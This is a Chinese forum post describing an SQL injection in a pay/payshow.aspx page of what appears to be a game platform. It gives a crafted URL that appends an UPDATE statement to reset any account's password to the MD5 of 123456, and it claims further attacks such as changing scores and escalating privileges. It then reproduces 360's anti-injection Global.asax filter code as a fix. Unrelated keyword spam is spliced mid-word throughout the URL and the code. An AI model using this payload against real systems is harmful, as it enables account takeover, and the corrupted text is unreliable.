|
|
先看下网站是否存在pay/payshow.aspx页面。
构造
url=http://192.168.1.8/pay/payshow.aspx?orderid=1';UPDATE%20QPAccountsDB.文件dbo.Accou恶意讨薪nts
I文件管理器nfo%2字符串是什么意思0SET%20LogonPass%20=%20'E10ADC3949BA59目录页码怎么对齐ABBE56E057F20F883E'%20WHER
E%20accounts%20=用户名%20--
E10ADC39恶意调岗降薪怎么离职49BA59ABBE56E057F20F883E=MD5(123456)
直接访问URL,看看密码是不是变成123456了。
自己构造别的语句,可以数据漫游是什么意思修改任意分数,读取服务器目录,提权.......字符间距....
其他页面也有这样的BUG。
以下是360通用sql文件管理防注入方法字符是什么。
-----------------使用方法文件传输助手------------------------------------------------------------------
1.将Ap恶意讨薪p_Code目录拷贝到web根目录
假如已经存在App_文件格式Code目录,那直接把App_Code目录里的360safe.cs文件拷贝到当前恶意讨薪
的
App_Code目录即可。
2.将Glo字符串是什么意思bal.asax文件拷贝到web根目录
假如已经存在Global.asax文件,那直接把下面这段代码
voidApplication_BeginRequest(objectsender,EventArgse)
{
if(Request.Cookies!=null)
{
if(safe_360.CookieData())
{
Response.Write("您提交的Cookie数据有恶意字符!");
Response.End();
}
}
if(Request.UrlRefer恶意小说rer!=null)
{
if(safe_360.referer()){
Response.Write("您提交的数据恢复软件免费版Referrer数据有恶意字符!");
Response.End();
}
}
if(Request.RequestType.ToUpper(目录英文)=="POST")
- `3 ?! L6 J4 t& n% Z+ U
{
if(safe_3数据分析60.PostData())
{
Response.Write("您提交的Post数据有恶意字符!");
Response.End();
}
}
if(Request.Reque目录格式stType.ToUpper()=="GET")
{
if(safe_360.GetData()数据结构)
{
Response.Wri字符间距加宽2磅te("您提交的Get数据有恶意字符!");
Respo恶意借贷立案标准nse.End();
}
}
}
拷贝到当前的Global.asax文件里保存。
修复方法:安装个安全狗就OK了
|
|
发表于 2023-8-9 03:17:20